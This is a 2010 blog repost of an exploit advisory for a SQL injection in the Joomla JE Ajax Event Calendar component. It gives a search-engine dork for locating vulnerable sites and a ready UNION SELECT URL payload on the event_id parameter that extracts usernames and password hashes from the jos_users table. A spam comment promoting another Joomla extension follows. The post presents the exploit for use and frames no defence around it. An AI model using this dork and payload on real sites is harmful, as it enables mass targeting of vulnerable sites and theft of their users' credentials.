Friday, November 26, 2010

Joomla JE Ajax Event Calendar Component (com_jeajaxeventcalendar) SQL Injection

1
in

# Vendor:
http://joomlaextensions.co.in/extensions/components/je-ajax-event-calender.html

# Download:
http://extensions.joomla.org/extensions/calendars-a-events/events/events-calendars/12110

# Author: altbta

# Contact: l_9[at]Hotmail[Dot]com

# Home: http://xp10.com

# Thanks to: rxh xp10.com >> v4-team.com >> p0c.cc :))

==========================================================================

[+] Dork: inurl:"index.php?option=com_jeajaxeventcalendar"

==========================================================================

[+] exploit:
http://127.168.1.1/index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4/**/from/**/jos_users--

1 comments:

Unknown said...

Thanks for the link you provided,it's very helpful to know about joomla event calendar.
I refer you to visit this website for joomla extension:
http://www.apptha.com/joomla/apptha-eventz

August 20, 2013 at 6:09 AM

Post a Comment

About Me

My photo
Блог за истражување и развој на информациска безбедност, кој е наменет за постирање на најнови ранливости и слабости. Founder darknessn1k0!4

 
Design by ThemeShift | Bloggerized by Lasantha - Free Blogger Templates | Best Web Hosting